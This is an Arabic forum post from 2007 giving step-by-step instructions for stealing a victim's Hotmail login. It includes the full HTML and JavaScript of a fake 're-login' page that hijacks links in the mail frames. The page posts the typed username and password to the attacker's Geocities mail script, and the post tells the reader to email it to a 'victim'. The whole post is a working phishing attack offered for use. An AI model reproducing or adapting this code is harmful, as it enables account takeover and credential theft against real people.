عرض مشاركة واحدة
قديم 02-21-2007, 09:16 PM   #1 (permalink)

Gangasta

عضو ماسى
 




 
Gangasta على طريق التميز

افتراضي



بسم الله الرحمن الرحيم

تتحدث هذي القطعه عن كيفيه اختراق الهوت ميل و سرقه الباسورد و اليوسرنيم للضحيه وبذلك يكون لك الحق في التحكم في الاميل تحكم كامل

ويتم هذا عن طريق الjava script

اي انك تقوم بارفاق ملف الجافا مع الاميل و ذلك سيدفع المستخدم الي اعاده النسجيل و هكذا تحصل علي البيانات الخاصه به

طريقه استخدام هذي الثغره

[hide]

1- قم بتسجيل و عمل ايميل لك في الهوتميل ولا داعي لكتابه البيانات صحيخه

2-اذهب الي geocities و قم ياختيار username وليكونybwc ثم قم بالتسجيل من اجل صفحه لك و ادخل بيانات خاطئه فيما عدا الاميل (اي ادخل فقط الاميل الذي فرغت من تسجيله في الهوتميل) و نتيجه هذي الخطوه ستحصل علي اميل جديد و سيكون بعنوان ybwc@geocitis.com (ybwc@geocitis.com)

3-افتح النوتباد و اكتب هذا الكود



<html><head></head><body>



"Go where you want today" - Blue Adept</p>

<script>

function getmess(){

return "<table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>" +

"<tr valign=middle>" +

"<th colspan=2>" +

"<font face=\"Arial, Helvetica\" size=\"5\">" +

"We're Sorry, We Cannot
Process Your Request" +

"</font></th></tr>" +

"<tr valign=middle><td align=center>" +

"<font face=\"Arial, Helvetica\" size=\"3\">Reason: </font>" +

"<font face=\"Arial, Helvetica\" size=\"3\" color=\"#ff0000\">Time expired. Please re-login.</font>
" +

"<font face=\"Arial, Helvetica\" size=\"2\"><a href=\"http://www.- تم حذف البريد -/errormsg.html\">(Get more info regarding error messages here)</a></font>" +

"</td></tr>" +

"<tr valign=\"middle\"><td align=\"center\">" +

"<FORM METHOD=POST ACTION=\"http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc\" target=\"_top\">" +

"<INPUT TYPE=\"hidden\" NAME=\"next-url\" VALUE=\"http://www.- تم حذف البريد -\">" +

"<INPUT TYPE=\"hidden\" NAME=\"subject\" VALUE=\"Hotmail Password\">" +

"<table cellpadding=\"0\" cellspacing=\"5\" border=\"0\">" +

"<tr><td><font face=\"Arial, Helvetica\" size=\"2\">Login Name:</font>
<input type=\"text\" name=\"login\" size=\"16\" maxlength=\"16\"></td><td><font face=\"Arial, Helvetica\" size=\"2\">Password:</font>
<input type=\"password\" name=\"passwd\" size=\"16\" maxlength=\"16\"> <input type=\"submit\" value=\"Enter\"></td><tr>" +

"</table></form></td></tr>" +

"<tr valign=middle><th colspan=2 align=center>" +

"<font face=\"Arial, Helvetica\" size=\"3\">" +

"Return to <a href=\"http://welcome.to/www.- تم حذف البريد -\" target=\"_parent\">Hotmail's Homepage</a>." +

"</font></th></tr></table>" +

"

<img src=\"http://209.1.112.251/c9698.gif\" width=189 height=16 border=0 alt=\"Copyright 1996-1997\">";

}



nomenulinks=top.submenu.document.links.length;

for(i=0;i<nomenulinks-1;i++){

top.submenu.document.links[i].target="work";

top.submenu.document.links[i].href="java script:getmess()";

}



noworklinks=top.work.document.links.length;

for(i=0;i<noworklinks-1;i++){

top.work.document.links[i].target="work";

top.work.document.links[i].href="java script:getmess()";

}



</script>

</body>

</html>



ثم قم بحفظ الملف بامتداد html و ليكون message.html و ضع في الاعتبار ان اسم المستخدم و هو ybwc l,موجود في السطر رقم 17 اي انك تستطيع التغيير الي اسم مستخدم خاص بك!

4-اكتب رساله و ارفق بداخلها السكربت او ملف الرساله المحفوظه باسم message.html و ارسلها الي ايميل الضحيه



5-انتظر حتي يفتح الضحيه الاميل الخاص به ثم اذهب الي اميلك في الgeocities

و ستجد رساله بداخلها الاي بي و اسم المستخدم و كلمه المرور

تحياتي لكم

[/hide]




Gangasta غير متواجد حالياً   رد مع اقتباس